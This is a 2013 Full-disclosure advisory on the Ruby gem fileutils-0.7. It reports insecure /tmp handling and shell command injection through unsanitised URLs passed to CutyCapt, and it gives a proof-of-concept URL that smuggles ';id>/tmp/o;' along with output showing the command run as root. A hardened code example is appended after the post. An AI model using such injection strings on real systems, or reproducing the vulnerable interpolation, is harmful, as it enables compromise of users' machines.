[Full-disclosure] Fileutils ruby gem possible remote command execution and insecure file handling in /tmp
- To: full <full-disclosure@xxxxxxxxxxxxxxxxx>
- Subject: [Full-disclosure] Fileutils ruby gem possible remote command execution and insecure file handling in /tmp
- From: "Larry W. Cashdollar" <larry0@xxxxxx>
- Date: Thu, 28 Feb 2013 14:01:16 +0000 (GMT)
Fileutils ruby gem possible remote command execution and insecure file
handling in /tmp
2/23/2013

Hi list, I was looking at some gem files and noticed a few issues with
fileutils-0.7

http://rubygems.org/gems/fileutils

"A set of utility classes to extract meta data from different file types".

Handles files insecurely in /tmp, a directory is created for that file
extension say 'zip' and files are created/modified there. This directory can
be hijacked and the contents manipulated by a malicious user.

in ./lib/file_utils.rb

    def zip (target, *sources)
      targetdir = "#{FileUtils::Config.tmp_dir}/zip"
      id = 1
      while File.exists?(targetdir)
        targetdir = "#{FileUtils::Config.tmp_dir}/zip#{id}"
        id += 1
      end
      FileUtils.mkdir(targetdir)

where Config.tmp_dir = /tmp

in ./lib/file_utils/config.rb

    def self.tmp_dir
      @tmp_dir ||= '/tmp'
    end

Remote command execution:

From file_utils.rb, doesn't sanitize input on URLs passed to CutyCapt for
execution. If a URL contains shell characters say a ';' followed by a command
a remote attacker can execute a command on the client's system if they are
enticed to click an encoded url like:

need to test URL encoding not sure if this is valid.

http://bla.net.org;id>/tmp/o; -> http://tinyurl.com/a5scxzz

    def capture (url, target)
      command = FileUtils::Config::Xvfb.command(File.dirname(__FILE__) + "/../bin/CutyCapt --min-width=1024 --min-height=768 --url=#{url} --out=#{target}")
      `#{command}`
    end

partial PoC if client is tricked into using malicious URL:

    irb(main):001:0> `xvfb-run --server-args="-screen 0,1024x768x24" ./CutyCapt --url=http://www.example.org;id>/tmp/foo; --out=/tmp/tempf`
    xvfb-run: error: Xvfb failed to start
    sh: 1: --out=/tmp/tempf: not found
    => ""
    irb(main):002:0>

    root@ubuntu:~/CutyCapt/cutycapt/CutyCapt# ls -l /tmp/foo
    -rw-r--r-- 1 root root 39 Feb 27 02:56 /tmp/foo
    root@ubuntu:~/CutyCapt/cutycapt/CutyCapt# cat /tmp/foo
    uid=0(root) gid=0(root) groups=0(root)
    root@ubuntu:~/CutyCapt/cutycapt/CutyCapt#

Michael Scherer of Redhat.com found other issues during a discussion about
the above issues I found:

In fact, there is the same similar problem in another file:

    result = `#{FileUtils::Config::OpenOffice.python} #{command} #{source} #{target} #{FileUtils::Config::OpenOffice.port}`

I quickly checked using irb (a quick command line to type ruby snippet), and
yes, using funky chars result in funky results.

There is another issue in

    # Generates a temp filepath for the given extension
    def temp (extension)
      path = "#{FileUtils::Config.tmp_dir}/tmp.#{extension}"
      id = 1
      while File.exists?(path)
        path = "#{FileUtils::Config.tmp_dir}/tmp.#{id}.#{extension}"
        id += 1
      end

Since someone could just create the file at the last moment, and make a link
so the script would overwrite an arbitrary file.

Thanks to vl4dz and Michael.

Larry W. Cashdollar
@_larry0
http://vapid.dhs.org
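
A hardened form of the two patterns reported above (the shell-interpolated capture command and the predictable paths under /tmp), as an added example that is not code from the post or from the gem. The CutyCapt path, the method names and the sample URL are assumptions made for illustration.

```ruby
require "open3"
require "rbconfig"
require "tmpdir"
require "uri"

CUTYCAPT = "./CutyCapt" # assumed path; the gem resolves its own bin/ directory

# Accept only well-formed http(s) URLs. This rejects strings such as
# "--out=..." but is not enough on its own: ';' is legal inside a URL.
def validated_url(url)
  uri = URI.parse(url)
  ok = uri.is_a?(URI::HTTP) && !uri.host.to_s.empty?
  raise ArgumentError, "only http(s) URLs are accepted" unless ok
  uri.to_s
rescue URI::InvalidURIError
  raise ArgumentError, "malformed URL"
end

# Argument vector for the capture() call quoted above; each element reaches
# the program as one argv entry, whatever characters it contains.
def capture_argv(url, target)
  ["xvfb-run", "--server-args=-screen 0,1024x768x24", CUTYCAPT,
   "--min-width=1024", "--min-height=768",
   "--url=#{validated_url(url)}", "--out=#{target}"]
end

# Run argv with no shell: given several arguments, Open3 execs the program directly.
def run_without_shell(argv)
  output, status = Open3.capture2e(*argv)
  [output, status.success?]
end

# Constructed check: a child Ruby process echoes its first argument back unchanged.
def echo_argument(arg)
  run_without_shell([RbConfig.ruby, "-e", "print ARGV[0]", arg]).first
end

# Replaces the exists?-then-mkdir loop: mktmpdir creates a mode-0700 directory
# with an unpredictable name in a single step and removes it after the block.
def with_private_workdir(prefix)
  Dir.mktmpdir(prefix) { |dir| yield dir }
end
```

Passing `capture_argv(url, target)` to `run_without_shell` gives the same CutyCapt invocation without `sh` ever parsing the URL, and the same argument-vector approach applies to the OpenOffice command line quoted above.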